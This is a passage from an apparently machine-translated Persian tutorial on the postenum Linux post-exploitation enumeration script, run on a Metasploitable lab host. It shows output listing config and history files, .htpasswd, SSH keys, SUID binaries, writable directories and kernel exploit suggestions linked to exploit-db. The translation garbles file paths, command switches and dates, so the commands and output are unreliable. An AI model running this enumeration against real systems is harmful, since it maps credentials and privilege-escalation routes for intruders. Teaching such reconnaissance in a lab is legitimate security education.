-rw-r--r-- 1 www-data www-data 19 Apr 16 2010 phpinfo.php
drwxr-xr-x 3 www-data www-data 4.0 K 14 مه 2012 آزمون
drwxrwxr-x 22 www-data www-data 20K Apr 12 سال 2018 tikiwiki
drwxrwxr-x 22 www-data www-data 20K Apr 16 2010 tikiwiki قدیمی
drwxr-xr-x 7 www-data www-data 4.0 K Apr 16 2010 twiki ls: cannot access /var/www/html: بدون چنین فایل یا دایرکتوری [x] جستجو در config.* و db.* فایل /var:
-rw-r--r-- 1 root root 21424 20 مه 2012 /var/cache/debconf/config.dat
-rw-r--r-- 1 root root 21308 20 مه 2012 /var/cache/debconf/config.dat-قدیمی
-rw-r--r-- 1 www-data www-data 18684 Mar 16 2010 /var/www/dvwa/external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php
-rw-r--r-- 1 www-data www-data 2772 Mar 16 2010 /var/www/dvwa/خارجی/phpids/0.6/lib/IDS/Config/Config.ini
-rw-r--r-- 1 www-data www-data 576 20 مه 2012 /var/www/dvwa/config/config.inc.php
-rw-r--r-- 1 www-data www-data 576 Aug 26 2010 /var/www/dvwa/config/config.inc.php~
-rwxr-xr-x 1 www-data www-data 175 May 4 سال 2018 /var/www/mutillidae/config.inc
-rwxr-xr-x 1 www-data www-data 20810 Apr 11 2011 /var/www/mutillidae/owasp-esapi-php/lib/htmlpurifier/HTMLPurifier/Config.php
-rw-r--r-- 1 www-data www-data 60881 9 Dec 2008 /var/www/phpMyAdmin/libraries/config.default.php
-rw-r--r-- 1 www-data www-data 4066 9 Dec 2008 /var/www/phpMyAdmin/libraries/auth/config.auth.lib.php
-rw-r--r-- 1 www-data www-data 35105 9 Dec 2008 /var/www/phpMyAdmin/libraries/Config.class.php
-rw-r--r-- 1 www-data www-data 2093 9 Dec 2008 /var/www/phpMyAdmin/config.sample.inc.php
-rw-r--r-- 1 www-data www-data 1584 9 Dec 2008 /var/www/phpMyAdmin/setup/frames/config.inc.php
-rw-r--r-- 1 www-data www-data 2719 9 Dec 2008 /var/www/phpMyAdmin/setup/config.php
-rw-rw-r-- 1 www-data www-data 1770 Aug 26 2004 /var/www/tikiwiki-old/lib/sheet/conf/config.inc.php
-rw-rw-r-- 1 www-data www-data 3383 Feb 21 2008 /var/www/tikiwiki-old/lib/Galaxia/config.tikiwiki.php
-rw-rw-r-- 1 www-data www-data 3383 Feb 21 2008 /var/www/tikiwiki-old/lib/Galaxia/config.php
-rw-rw-r-- 1 www-data www-data 3449 Feb 21 2008 /var/www/tikiwiki-old/lib/Galaxia/config.xaraya.php
-rw-rw-r-- 1 www-data www-data 9269 Nov 12 2005 /var/www/tikiwiki-old/lib/wiki3d/src/java/br/arca/morcego/Config.java
-rw-rw-r-- 1 www-data www-data 45 Mar 12 2005 /var/www/tikiwiki-old/lib/smarty/unit_test/config.php
-rw-rw-r-- 1 www-data www-data 258 Apr 24 2003 /var/www/tikiwiki-old/img/icons/config.gif
-rw-rw-r-- 1 www-data www-data 1770 Aug 26 2004 /var/www/tikiwiki/lib/sheet/conf/config.inc.php
-rw-rw-r-- 1 www-data www-data 3219 28 Jan 2006 /var/www/tikiwiki/lib/Galaxia/config.tikiwiki.php
-rw-rw-r-- 1 www-data www-data 3219 Jan 30 سال 2006 /var/www/tikiwiki/lib/Galaxia/config.php
-rw-rw-r-- 1 www-data www-data 3259 Jan 28 2004 /var/www/tikiwiki/lib/Galaxia/config.xaraya.php
-rw-rw-r-- 1 www-data www-data 9269 Nov 12 2005 /var/www/tikiwiki/lib/wiki3d/src/java/br/arca/morcego/Config.java
-rw-rw-r-- 1 www-data www-data 45 Mar 12 2005 /var/www/tikiwiki/lib/smarty/unit_test/config.php
-rw-rw-r-- 1 www-data www-data 258 Apr 24 2003 /var/www/tikiwiki/img/icons/config.gif [+] - جستجو برای فایل های مخفی
[x] فایل های مخفی:
-rw-r--r-- 1 خدمات خدمات 586 Apr 16 2010 /صفحه اصلی/خدمات/.مشخصات
-rw-r--r-- 1 خدمات خدمات 2928 Apr 16 2010 /صفحه اصلی/خدمات/.bashrc
-rw-r--r-- 1 خدمات خدمات 220 Apr 16 2010 /صفحه اصلی/خدمات/.bash_logout
-rw-r--r-- 1 کاربر 586 Mar 31 2010 /home/user/.مشخصات
-rw------- 1 کاربر 165 7 مه 2010 /home/user/.bash_history
-rw-r--r-- 1 کاربر 2928 Mar 31 2010 /home/user/.bashrc
-rw-r--r-- 1 کاربر 220 Mar 31 2010 /home/user/.bash_logout
-rw------- 1 ریشه ریشه 4174 May 14 2012 /صفحه اصلی/msfadmin/.mysql_history
-rw-r--r-- 1 msfadmin msfadmin 1598 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/bin/.htaccess.txt
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16 2010 /صفحه اصلی/msfadmin/آسیب پذیر/twiki20030201/twiki-منبع/data/Sandbox/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 1436 Apr 16 2010 /صفحه اصلی/msfadmin/آسیب پذیر/twiki20030201/twiki-منبع/data/Sandbox/.تغییرات
-rw-r--r-- 1 msfadmin msfadmin 210 Apr 16 2010 /صفحه اصلی/msfadmin/آسیب پذیر/twiki20030201/twiki-منبع/data/.htpasswd
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16 2010 /صفحه اصلی/msfadmin/آسیب پذیر/twiki20030201/twiki-منبع/data/Main/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 3657 Apr 16 2010 /صفحه اصلی/msfadmin/آسیب پذیر/twiki20030201/twiki-منبع/data/Main/.تغییرات
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16 2010 /صفحه اصلی/msfadmin/آسیب پذیر/twiki20030201/twiki-منبع/data/می دانم/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 3489 Apr 16 2010 /صفحه اصلی/msfadmin/آسیب پذیر/twiki20030201/twiki-منبع/data/می دانم/.تغییرات
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16 2010 /صفحه اصلی/msfadmin/آسیب پذیر/twiki20030201/twiki-منبع/data/TWiki/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 4189 Apr 16 2010 /صفحه اصلی/msfadmin/آسیب پذیر/twiki20030201/twiki-منبع/data/TWiki/.تغییرات
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16 2010 /صفحه اصلی/msfadmin/آسیب پذیر/twiki20030201/twiki-منبع/data/_default/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 683 Apr 16 2010 /صفحه اصلی/msfadmin/آسیب پذیر/twiki20030201/twiki-منبع/data/_default/.تغییرات
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16 2010 /صفحه اصلی/msfadmin/آسیب پذیر/twiki20030201/twiki-منبع/data/زباله/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 767 Apr 16 2010 /صفحه اصلی/msfadmin/آسیب پذیر/twiki20030201/twiki-منبع/data/زباله/.تغییرات
-rwx------ 1 msfadmin msfadmin 4 مارس 20 2012 /صفحه اصلی/msfadmin/.rhosts
-rw-r--r-- 1 msfadmin msfadmin 586 Mar 16 2010 /صفحه اصلی/msfadmin/.مشخصات
-rw-r--r-- 1 msfadmin msfadmin 0 7 مه 2010 /صفحه اصلی/msfadmin/.sudo_as_admin_successful
-rw------- 1 msfadmin msfadmin 0 Jun 6 سال 2018 /صفحه اصلی/msfadmin/.Xauthority
-rw-rw-rw - 1 ریشه daemon 1 Aug 8 سال 2018 /lib/tls/i686/cmov/.4tJrYgzxS.بنابراین
-rw-rw-rw - 1 ریشه daemon 1 Jun 19 12:56 /lib/tls/i686/cmov/.CsUPZ8Z0.بنابراین
-rw-r--r-- 1 root root 5 Dec 5 2007 /usr/share/python-پشتیبانی/antlr/.نسخه
-rw-r--r-- 1 root root 2 Aug 29 2007 /usr/share/python-پشتیبانی/python-gnupginterface/.نسخه
-rw-r--r-- 1 root root 0 20 مه 2012 /usr/lib/فایرفاکس-3.6.17/.autoreg
-rw-r--r-- 1 root root 1258 Mar 10 سال 2008 /usr/lib/jvm/.جاوا-gcj.jinfo
-rw------- 1 ریشه ریشه 215 Jun 19 13:46 /root/.mysql_history
-rwx------ 1 ریشه ریشه 4 مارس 20 2012 /root/.rhosts
-rw-r--r-- 1 root root 141 Oct 20 سال 2007 /root/.مشخصات
-rw-r--r-- 1 root root 173 Jun 19 2019 /root/.bash_history
-rw------- 1 ریشه ریشه 324 Jun 19 13:21 /root/.Xauthority
-rw-r--r-- 1 root root 2227 Oct 20 سال 2007 /root/.bashrc
-rw-r--r-- 1 root root 102 May 8 2008 /etc/cron.ماهانه/.حفره یا سوراخ
-rw-r--r-- 1 root root 102 May 8 2008 /etc/cron.هفتگی/.حفره یا سوراخ
-rw-r--r-- 1 root root 102 May 8 2008 /etc/cron.d/.حفره یا سوراخ
-rw-r--r-- 1 root root 586 Apr 14 2008 /etc/skel/.مشخصات
-rw-r--r-- 1 root root 2928 Apr 14 2008 /etc/skel/.bashrc
-rw-r--r-- 1 root root 220 Apr 14 2008 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 102 May 8 2008 /etc/cron.روزانه/.حفره یا سوراخ
-rw-r--r-- 1 root root 102 May 8 2008 /etc/cron.ساعات روز/.حفره یا سوراخ
-rw------- 1 ریشه ریشه 0 Mar 16 2010 /و غیره/.pwd.قفل
-rw-r--r-- 1 root root 0 Jun 19 13:20 /dev/.initramfs-ابزار
-rw------- 1 postgres postgres 34 Jun 19 13:21 /var/run/postgresql/.s.PGSQL.5432.قفل
-rw-r--r-- 1 root root 34 May 13 2012 /var/lib/python-پشتیبانی/python2.5/.مسیر
-rw------- 1 postgres postgres 131 30 Mar 2010 /var/lib/mysql/.bash_history
-rwxr-xr-x 1 www-data www-data 497 Sep 8 2010 /var/www/dvwa/.htaccess تغییر نام دهید
-rwxr-xr-x 1 www-data www-data 174 Apr 11 2011 /var/www/mutillidae/.buildpath
-rwxr-xr-x 1 www-data www-data 712 Apr 11 2011 /var/www/mutillidae/.پروژه
-rwxr-xr-x 1 www-data www-data 427 May 14 2012 /var/www/mutillidae/.htaccess تغییر نام دهید
-rw-r--r-- 1 www-data www-data 118 9 Dec 2008 /var/www/phpMyAdmin/کتابخانه/.htaccess تغییر نام دهید
-rwxrwxr-x 1 www-data www-data 66 Jan 22 2005 /var/www/tikiwiki-قدیمی/modules/کش/.htaccess تغییر نام دهید
-rwxrwxr-x 1 www-data www-data 66 Jan 19 2005 /var/www/tikiwiki-قدیمی/templates_c/.htaccess تغییر نام دهید
-rw-r--r-- 1 www-data www-data 1598 Jun 1 2002 /var/www/twiki/bin/.htaccess.txt
-rwxrwxrwx 1 www-data www-data 9 Oct 25 2001 /var/www/twiki/data/Sandbox/.mailnotify
-rwxrwxrwx 1 www-data www-data 1436 Feb 1 2003 /var/www/twiki/data/Sandbox/.تغییرات
-rw-r--r-- 1 www-data www-data 210 Jan 11 2003 /var/www/twiki/data/.htpasswd
-rwxrwxrwx 1 www-data www-data 9 Oct 25 2001 /var/www/twiki/data/Main/.mailnotify
-rwxrwxrwx 1 www-data www-data 3653 Apr 16 2010 /var/www/twiki/data/Main/.تغییرات
-rwxrwxrwx 1 www-data www-data 9 Oct 25 2001 /var/www/twiki/data/می دانم/.mailnotify
-rwxrwxrwx 1 www-data www-data 3489 Jan 30 2003 /var/www/twiki/data/می دانم/.تغییرات
-rwxrwxrwx 1 www-data www-data 9 Oct 25 2001 /var/www/twiki/data/TWiki/.mailnotify
-rwxrwxrwx 1 www-data www-data 4189 Feb 1 2003 /var/www/twiki/data/TWiki/.تغییرات
-rwxrwxrwx 1 www-data www-data 9 Oct 25 2001 /var/www/twiki/data/_default/.mailnotify
-rwxrwxrwx 1 www-data www-data 683 Jan 30 2003 /var/www/twiki/data/_default/.تغییرات
-rwxrwxrwx 1 www-data www-data 9 Oct 25 2001 /var/www/twiki/data/زباله/.mailnotify
-rwxrwxrwx 1 www-data www-data 767 Jan 25 2003 /var/www/twiki/data/زباله/.تغییرات
-rw------- 1 www-data www-data 4275 Jun 19 2019 /var/www/.bash_history
-rw-rw-r-- 1 www-data www-data 66 Jan 22 2005 /var/www/tikiwiki/modules/کش/.htaccess تغییر نام دهید
-rw-rw-r-- 1 www-data www-data 66 Jan 19 2005 /var/www/tikiwiki/templates_c/.htaccess تغییر نام دهید
-r--r--r-- 1 root root 11 Jun 19 13:21 /tmp/.X0-قفل [+] - برای چک کردن روشن-متن رمز عبور در /home/*
[x] پاک کردن متن رمز عبور:
-rwxr-xr-x 1 msfadmin msfadmin 6936 Apr 16 2010 /صفحه اصلی/msfadmin/آسیب پذیر/twiki20030201/twiki-منبع/bin/passwd [+] - جالب ترین ssh فایل /
[x] SSH فایل ها:
-rw-r--r-- 1 root root 442 20 مه 2012 /root/.ssh/known_hosts
-rw-r--r-- 1 root root 405 مارس 17 2010 /root/.ssh/authorized_keys [+] - بررسی مهم بیت SUID و SGID
[x] SUID - 4000:
-rwsr-xr-x 1 root root 63584 Apr 14 2008 /bin/umount
-rwsr-xr-- 1 root فیوز 20056 Feb 26 2008 /bin/fusermount
-rwsr-xr-x 1 root root 25540 May 2 2008 /bin/su
-rwsr-xr-x 1 root root 81368 Apr 14 2008 /bin/کوه
-rwsr-xr-x 1 root root 30856 10 Dec 2007 /bin/ping
-rwsr-xr-x 1 root root 26684 10 Dec 2007 /bin/ping6
-rwsr-xr-x 1 root root 65520 Dec 2 2008 /sbin/کوه.nfs
-rwsr-xr-- 1 root dhcp 2960 May 2 2008 /lib/dhcp3-مشتری/تماس dhclient-اسکریپت
-rwsr-xr-x 2 ریشه ریشه 107776 Feb 25 سال 2008 /usr/bin/sudoedit
-rwsr-sr-x 1 root root 7460 Jun 25 سال 2008 /usr/bin/X
-rwsr-xr-x 1 root root 8524 Nov 22 2007 /usr/bin/netkit-ign
-rwsr-xr-x 1 root root 37360 May 2 2008 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 12296 10 Dec 2007 /usr/bin/traceroute6.iputils
-rwsr-xr-x 2 ریشه ریشه 107776 Feb 25 سال 2008 /usr/bin/sudo
-rwsr-xr-x 1 root root 12020 Nov 22 2007 /usr/bin/netkit-rlogin
-rwsr-xr-x 1 root root 11048 10 Dec 2007 /usr/bin/arping
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 سال 2007 /usr/bin/در
-rwsr-xr-x 1 root root 19144 May 2 2008 /usr/bin/newgrp
-rwsr-xr-x 1 root root 28624 May 2 2008 /usr/bin/chfn
-rwsr-xr-x 1 root root 780676 May 8 2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 23952 May 2 2008 /usr/bin/chsh
-rwsr-xr-x 1 root root 15952 Nov 22 2007 /usr/bin/netkit-rcp
-rwsr-xr-x 1 root root 29104 May 2 2008 /usr/bin/passwd
-rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
-rwsr-xr-- 1 root شیب 269256 Oct 4 2007 /usr/sbin/pppd
-rwsr-xr-- 1 root telnetd 6040 17 دسامبر 2006 /usr/lib/telnetlogin
-rwsr-xr-- 1 root www-data 10276 Mar 9 2010 /usr/lib/apache2/suexec
-rwsr-xr-x 1 root root 4524 Nov 5 2007 /usr/lib/eject/dmcrypt-دریافت-دستگاه
-rwsr-xr-x 1 root root 165748 May 6 2008 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9624 Aug 2009 17 /usr/lib/pt_chown [x] SGID - 2000:
-rwxr-sr-x 1 root shadow 19584 May 9 2008 /sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 3192 Apr 22 2008 /usr/bin/Eterm
-rwsr-sr-x 1 root root 7460 Jun 25 سال 2008 /usr/bin/X
-rwxr-sr-x 1 root tty 8192 Dec 12 2007 /usr/bin/bsd-نوشتن
-rwxr-sr-x 1 root ssh 76580 May 6 2008 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 30508 Mar 8 2008 /usr/bin/mlocate
-rwxr-sr-x 1 root crontab 26928 May 8 2008 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 37904 May 2 2008 /usr/bin/chage
-rwxr-sr-x 1 root utmp 308228 Oct 23 2007 /usr/bin/صفحه نمایش
-rwxr-sr-x 1 root shadow 16424 May 2 2008 /usr/bin/انقضاء
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 سال 2007 /usr/bin/در
-rwxr-sr-x 1 root utmp 306996 Jan 2 2009 /usr/bin/xterm
-rwxr-sr-x 1 root tty 9960 Apr 14 2008 /usr/bin/دیوار
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
-r-xr-sr-x 1 root postdrop 10312 Apr 18 سال 2008 /usr/sbin/postqueue
-r-xr-sr-x 1 root postdrop 10036 Apr 18 سال 2008 /usr/sbin/postdrop [x] چسبنده بیت برای پوشه ها - 1000:
drwxrwxrwt 2 root root 40 Jun 19 13:21 /dev/shm
drwxrwxr-t 2 ریشه postgres 4096 May 8 2010 /var/log/postgresql
drwxrwxrwt 3 root root 60 Jun 19 13:21 /var/lock
drwx-wx-wt 2 ریشه ریشه 118784 Jun 19 13:29 /var/lib/php5
drwxrwxrwt 2 root root 4096 Jun 19 13:35 /var/tmp
drwxrwxrwt 3 root root 4096 Jun 19 2019 /var/www/dav
drwxrwx--T 2 daemon daemon 4096 May 16 2010 /var/spool/cron/atjobs
drwxrwx--T 2 daemon daemon 4096 Feb 20 سال 2007 /var/spool/cron/atspool
drwx-wx-تی 2 ریشه crontab 4096 May 8 2008 /var/spool/cron/crontabs
drwx-wx-تی 2 postfix postdrop 4096 May 7 2010 /var/spool/postfix/خطا maildrop
drwxrwxrwt 4 root root 4096 Jun 19 13:23 /tmp
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.یخ-یونیکس
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.X11-یونیکس [+] - چک نوشته شده و مکان های اجرایی
[x] جهان-قابل نوشتن پوشه ها - 222:
drwxrwxrwt 2 root root 40 Jun 19 13:21 /dev/shm
drwxrwxrwt 3 root root 60 Jun 19 13:21 /var/lock
drwx-wx-wt 2 ریشه ریشه 118784 Jun 19 13:29 /var/lib/php5
drwxrwxrwt 2 root root 4096 Jun 19 13:35 /var/tmp
drwxrwxrwt 3 root root 4096 Jun 19 2019 /var/www/dav
drwxrwxrwx 2 www-data www-data 4096 Feb 1 2003 /var/www/twiki/data/گودال ماسهبازی
drwxrwxrwx 2 www-data www-data 4096 May 16 2010 /var/www/twiki/data/اصلی
drwxrwxrwx 2 www-data www-data 4096 Jan 30 2003 /var/www/twiki/data/می دانم
drwxrwxrwx 2 www-data www-data 16384 Feb 1 2003 /var/www/twiki/data/TWiki
drwxrwxrwx 2 www-data www-data 4096 Jan 30 2003 /var/www/twiki/data/_default
drwxrwxrwx 2 www-data www-data 4096 Feb 1 2003 /var/www/twiki/data/سطل زباله
drwxrwxrwx 2 www-data www-data 4096 May 21 2002 /var/www/twiki/pub/گودال ماسهبازی
drwxrwxrwx 2 www-data www-data 4096 May 7 سال 2002 /var/www/twiki/pub/اصلی
drwxrwxrwx 3 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/می دانم
drwxrwxrwx 2 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/می دانم/IncorrectDllVersionW32PTH10DLL
drwxrwxrwx 8 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/TWiki
drwxrwxrwx 2 www-data www-data 4096 Jan 21 2003 /var/www/twiki/pub/TWiki/TWikiDocGraphics
drwxrwxrwx 2 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/TWiki/TWikiTemplates
drwxrwxrwx 2 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/TWiki/TWikiLogos
drwxrwxrwx 2 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/TWiki/PreviewBackground
drwxrwxrwx 2 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/TWiki/FileAttachment
drwxrwxrwx 2 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/TWiki/WabiSabi
drwxrwxrwx 2 www-data www-data 4096 Dec 4 2001 /var/www/twiki/pub/سطل زباله
drwxrwxrwx 2 www-data www-data 4096 Feb 1 2003 /var/www/twiki/pub/icn
drwxrwxrwt 4 root root 4096 Jun 19 13:23 /tmp
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.یخ-یونیکس
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.X11-یونیکس [x] جهان-قابل نوشتن فایل - 0002:
304795 4-rw-rw-rw - 1 ریشه daemon 1 Aug 8 سال 2018 /lib/tls/i686/cmov/.4tJrYgzxS.بنابراین
304796 4-rw-rw-rw - 1 ریشه daemon 1 Jun 19 12:56 /lib/tls/i686/cmov/.CsUPZ8Z0.بنابراین 11265 0 srw-rw-rw - 1 root root 0 Jun 19 13:21 /dev/ورود به سیستم 10037 0 drwxrwxrwt 2 root root 40 Jun 19 13:21 /dev/shm 6130 0 crw-rw-rw - 1 root root Mar 16 2010 /dev/null 5082 0 crw-rw-rw - 1 ریشه tty Jun 19 13:20 /dev/ttyzf ... [+] - لطفا برای خواندن logfiles متعلق به root
[x] جهان-خواندن logfiles - 0004:
-rw-r--r-- 1 root root 88953 Jul 5 سال 2018 /var/log/dpkg.ورود به سیستم
-rw-r--r-- 1 root root 5376 Jun 19 13:22 /var/log/wtmp
-rw-r--r-- 1 root root 96 Mar 16 2010 /var/log/نصب/lsb-release
-rw-r--r-- 1 root root 0 Mar 16 2010 /var/log/installer/initial-status.gz
-rw-r--r-- 1 root root 58721 Mar 16 2010 /var/log/نصب/وضعیت
-rw-r--r-- 1 root root 46866 Mar 16 2010 /var/log/نصب/سخت افزار-خلاصه
-rw-r--r-- 1 root adm 16950 Jun 19 13:41 /var/log/dmesg.0
-rw-r--r-- 1 root root 292114 Jun 19 13:20 /var/log/udev
-rw-r--r-- 1 root adm 6419 Jun 19 13:52 /var/log/dmesg.4.gz
-rw-r--r-- 1 root adm 6405 Jun 19 13:21 /var/log/dmesg.3.gz
-rw-r--r-- 1 root اخبار 0 Mar 16 2010 /var/log/news/news.crit
-rw-r--r-- 1 root اخبار 0 Mar 16 2010 /var/log/news/news.متوجه
-rw-r--r-- 1 root اخبار 0 Mar 16 2010 /var/log/news/news.گمراه
-rw-r--r-- 1 root root 0 20 مه 2012 /var/log/بوت
-rw-r--r-- 1 root adm 6446 Jun 19 13:20 /var/log/dmesg.2.gz
-rw-r--r-- 1 root root 0 20 مه 2012 /var/log/btmp
-rw-r--r-- 1 root adm 6414 Jun 19 13:21 /var/log/dmesg.1.gz
-rw-r--r-- 1 root root 292292 Jun 19 13:22 /var/log/lastlog
-rw-r--r-- 1 root adm 16992 Jun 19 13:21 /var/log/dmesg [+] - List NFS سهام و permisisons
[x] NFS:
-rw-r--r-- 1 root root 367 May 13 2012 /etc/exports

شروع با چک کردن برای هر جالب فایل های واقع در استاندارد وب سرور دایرکتوری ها. بعد از آن به نظر می رسد برای فایل های مخفی SSH فایل ها و هر متن روشن کردن کلمه عبور در صفحه اصلی دایرکتوری ها. سپس آن را چک کنید برای SUID, SGID و چسبنده بیت است. در نهایت به نظر می رسد برای هر قابلیت نوشتن و اجرایی دایرکتوری ها و شامل هر NFS سهام است که در حال حاضر بر روی سیستم.

مرحله 9: OS اطلاعات و هسته سوء استفاده

گزینه بعدی ما نگاهی به ما اطلاعات مربوط به سیستم عامل و نشان می دهد هر گونه مربوطه هسته سوء استفاده است که به طور بالقوه می تواند مورد استفاده قرار گیرد به تشدید امتیازات و ریشه. استفاده از -o سوئیچ برای این:

هدف:/var/tmp$ ./postenum.sh -o -------------------------------------------------------------------------- _ _ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | نسخه : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_| پس از شمارش توسط mbahadou
-------------------------------------------------------------------------- postenum - بود ریشه برای کمک و یا گزارش مسائل بازدید https://github.com/mbahadou/postenum [-] سیستم عامل
[+] - بررسی کاربر و اطلاعات گروه
[x] فعلی کاربر و اطلاعات گروه:
uid=33(www-data) gid=33(www-data) گروه=33(www-data) [x] کاربر فعلی:
www-data [+] - بررسی پروانه و شماره نسخه
[x] این پروانه و نسخه:
DISTRIB_ID=اوبونتو
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=هاردی
DISTRIB_DESCRIPTION="اوبونتو 8.04" [+] - Check نسخه کرنل
[x] نسخه کرنل و (32-bit/64-bit):
لینوکس metasploitable 2.6.24-16-سرور #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 گنو/لینوکس [x] نسخه کرنل و gcc نسخه مورد استفاده برای کامپایل کرنل:
لینوکس نسخه 2.6.24-16-سرور ([email protected]پالمر) (gcc نسخه 4.2.3 (اوبونتو 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008 [+] - سوء استفاده
[x] امکان سوء استفاده برای هسته لینوکس 2.6.24:
لیست محبوب ترین سوء استفاده برای کرنل 4*
------------------------------------------------------ هسته لینوکس 2.6.39 < 3.2.2 Gentoo / اوبونتو x86-x64 Mempodipper(1) - https://www.exploit-db.com/exploits/18411 هسته لینوکس 2.6.39 < 3.2.2 x86-x64 Mempodipper(2) - https://www.exploit-db.com/exploits/35161 هسته لینوکس 3.7.6 (RedHat x86/x64) - https://www.exploit-db.com/exploits/27297 هسته لینوکس 3.13 < 3.19 اوبونتو 12.04/14.04/14.10/15.04 - https://www.exploit-db.com/exploits/37292 هسته لینوکس 3.13 SGID - https://www.exploit-db.com/exploits/33824 هسته لینوکس 3.13.1 (Metasploit) - https://www.exploit-db.com/exploits/40503 هسته لینوکس 3.14.5 (CentOS 7 / RHEL) - https://www.exploit-db.com/exploits/35370 لینوکس کرنل 3.x (اوبونتو 14.04/نعناع 17.3/Fedora 22) https://www.exploit-db.com/exploits/41999 هسته لینوکس < 4.4.0-116 (اوبونتو 16.04.4) - https://www.exploit-db.com/exploits/44298 هسته لینوکس < 4.10.15 شرایط مسابقه - https://www.exploit-db.com/exploits/43345 هسته لینوکس < 4.13.9 (اوبونتو 16.04 / فدورا 27) - https://www.exploit-db.com/exploits/45010 هسته لینوکس 2.6.22 < 3.9 کثیف گاو - https://www.exploit-db.com/exploits/40839 هسته لینوکس 2.6.22 < 3.9 کثیف گاو (x86-x64) - https://www.exploit-db.com/exploits/40616 خاص ترین سوء استفاده را برای هسته 2.6.24
------------------------------------------------------
هیچ چیز استخراج از سوء استفاده برای هسته 2.6.24

اول آن را به ما بدهد فعلی کاربر و اطلاعات است. سپس آن را به ما نشان می دهد توزیع نام و انتشار شماره, به دنبال نسخه کرنل و اطلاعات در مورد چگونه به هسته وارد شده بود. بعد از آن سوء استفاده احتمالی بر اساس نسخه کرنل همراه با لینک کلیک کنید برای خود Exploit Database صفحات.

وجود دارد که یکی از آخرین گزینه برای Postenum — توانایی اجرای همه این گزینه ها در یک بار. با استفاده از یک سوئیچ برای این یکی:

هدف:/var/tmp$ ./postenum.sh -یک -------------------------------------------------------------------------- _ _ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | نسخه : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_| پس از شمارش توسط mbahadou
-------------------------------------------------------------------------- postenum - بود ریشه برای کمک و یا گزارش مسائل بازدید https://github.com/mbahadou/postenum [-] سیستم عامل
[+] - بررسی کاربر و اطلاعات گروه
[x] فعلی کاربر و اطلاعات گروه:
uid=33(www-data) gid=33(www-data) گروه=33(www-data) [x] کاربر فعلی:
www-data [+] - بررسی پروانه و شماره نسخه
[x] این پروانه و نسخه:
DISTRIB_ID=اوبونتو
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=هاردی
DISTRIB_DESCRIPTION="اوبونتو 8.04" [+] - Check نسخه کرنل
[x] نسخه کرنل و (32-bit/64-bit):
لینوکس metasploitable 2.6.24-16-سرور #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 گنو/لینوکس [x] نسخه کرنل و gcc نسخه مورد استفاده برای کامپایل کرنل:
لینوکس نسخه 2.6.24-16-سرور ([email protected]پالمر) (gcc نسخه 4.2.3 (اوبونتو 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008 [+] - سوء استفاده
[x] امکان سوء استفاده برای هسته لینوکس 2.6.24:
لیست محبوب ترین سوء استفاده برای کرنل 4*
------------------------------------------------------ هسته لینوکس 2.6.39 < 3.2.2 Gentoo / اوبونتو x86-x64 Mempodipper(1) - https://www.exploit-db.com/exploits/18411 هسته لینوکس 2.6.39 < 3.2.2 x86-x64 Mempodipper(2) - https://www.exploit-db.com/exploits/35161 هسته لینوکس 3.7.6 (RedHat x86/x64) - https://www.exploit-db.com/exploits/27297 هسته لینوکس 3.13 < 3.19 اوبونتو 12.04/14.04/14.10/15.04 - https://www.exploit-db.com/exploits/37292 هسته لینوکس 3.13 SGID - https://www.exploit-db.com/exploits/33824 هسته لینوکس 3.13.1 (Metasploit) - https://www.exploit-db.com/exploits/40503 هسته لینوکس 3.14.5 (CentOS 7 / RHEL) - https://www.exploit-db.com/exploits/35370 لینوکس کرنل 3.x (اوبونتو 14.04/نعناع 17.3/Fedora 22) https://www.exploit-db.com/exploits/41999 